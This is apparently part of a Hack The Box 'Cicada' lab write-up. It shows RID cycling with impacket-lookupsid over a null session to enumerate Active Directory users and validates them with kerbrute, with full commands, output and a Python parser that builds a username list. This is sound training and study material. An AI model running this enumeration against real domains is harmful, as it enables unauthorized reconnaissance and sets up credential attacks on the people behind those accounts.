RID Cycling


Both the SMB and MSRPC servers allow null sessions, which means a RID cycling attack can be used to brute-force users' RIDs.

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-lookupsid CICADA.HTB/blahblah@cicada-dc.cicada.htb 100000
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password:
[*] Brute forcing SIDs at cicada-dc.cicada.htb
[*] StringBinding ncacn_np:cicada-dc.cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Performing the RID cycling attack against the target SMB service with an arbitrary credential (blahblah) found the following domain users:

  • john.smoulder
  • sarah.dantelia
  • michael.wrightson
  • david.orelious
  • emily.oscars

Those usernames have been saved to the users.txt file
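The lookupsid output above is easy to reduce to a user list by hand, but the structure is worth making explicit: every line is a relative identifier (RID) appended to the single domain SID, well-known principals live below RID 1000, and accounts created in the domain are allocated from 1000 upwards. The parser below is an added example, not the author's or Impacket's code; it reads a copy of the output shown above (embedded inline as a sample), rebuilds each full SID from the domain SID and RID, and applies exactly the filter that yields the five usernames listed: `SidTypeUser`, RID at or above 1000, and not a machine account (name ending in `$`). The threshold of 1000 is a common default, not something the page states.

```python
import re
from typing import List, NamedTuple, Tuple

# Sample input: lines copied from the impacket-lookupsid output shown above.
SAMPLE_OUTPUT = r"""
[*] Brute forcing SIDs at cicada-dc.cicada.htb
[*] StringBinding ncacn_np:cicada-dc.cicada.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
"""


class SidEntry(NamedTuple):
    rid: int
    domain: str
    name: str
    sid_type: str  # SidTypeUser, SidTypeGroup, SidTypeAlias, ...


# "[*] Domain SID is: S-1-5-21-<a>-<b>-<c>"
DOMAIN_SID_RE = re.compile(r"\[\*\] Domain SID is: (S-1-5-21(?:-\d+){3})$")
# "<rid>: <DOMAIN>\<name> (<SidType>)"; the name may contain spaces.
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")


def parse_lookupsid(output: str) -> Tuple[str, List[SidEntry]]:
    """Return (domain SID, resolved entries) from impacket-lookupsid text."""
    domain_sid = None
    entries: List[SidEntry] = []
    for raw in output.splitlines():
        line = raw.strip()
        m = DOMAIN_SID_RE.match(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append(SidEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    if domain_sid is None:
        raise ValueError("no 'Domain SID is:' line in output")
    return domain_sid, entries


def full_sid(domain_sid: str, rid: int) -> str:
    """A principal's SID is the domain SID with its RID appended."""
    return f"{domain_sid}-{rid}"


def user_accounts(entries: List[SidEntry], min_rid: int = 1000) -> List[str]:
    """Human user accounts: SidTypeUser, domain-allocated RID, not a computer ($)."""
    return [
        e.name
        for e in entries
        if e.sid_type == "SidTypeUser" and e.rid >= min_rid and not e.name.endswith("$")
    ]


def builtin_accounts(entries: List[SidEntry], min_rid: int = 1000) -> List[str]:
    """Well-known principals (Administrator, Guest, krbtgt, default groups) sit below 1000."""
    return [e.name for e in entries if e.rid < min_rid]


def users_file(names: List[str]) -> str:
    """Contents for users.txt: one username per line, trailing newline."""
    return "".join(f"{n}\n" for n in names)


if __name__ == "__main__":
    sid, found = parse_lookupsid(SAMPLE_OUTPUT)
    print(f"Domain SID: {sid}")
    for e in found:
        print(f"{full_sid(sid, e.rid):<55} {e.sid_type:<13} {e.domain}\\{e.name}")
    users = user_accounts(found)
    with open("users.txt", "w") as fh:
        fh.write(users_file(users))
    print(f"wrote {len(users)} usernames to users.txt")
```

Run as a script it prints every resolved SID in full and writes `users.txt`; the same filter applied to the complete output above produces exactly the five names listed, with Administrator, Guest, krbtgt and CICADA-DC$ excluded.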

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ kerbrute userenum --dc cicada-dc.cicada.htb -d CICADA.HTB ./users.txt -t 200                            
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop
 
2024/09/28 22:24:16 >  Using KDC(s):
2024/09/28 22:24:16 >  	cicada-dc.cicada.htb:88
 
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 john.smoulder@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 emily.oscars@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 sarah.dantelia@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 david.orelious@CICADA.HTB
2024/09/28 22:24:16 >  [+] VALID USERNAME:	 michael.wrightson@CICADA.HTB
2024/09/28 22:24:16 >  Done! Tested 5 usernames (5 valid) in 0.027 seconds

5 usernames have been validated against the target KDC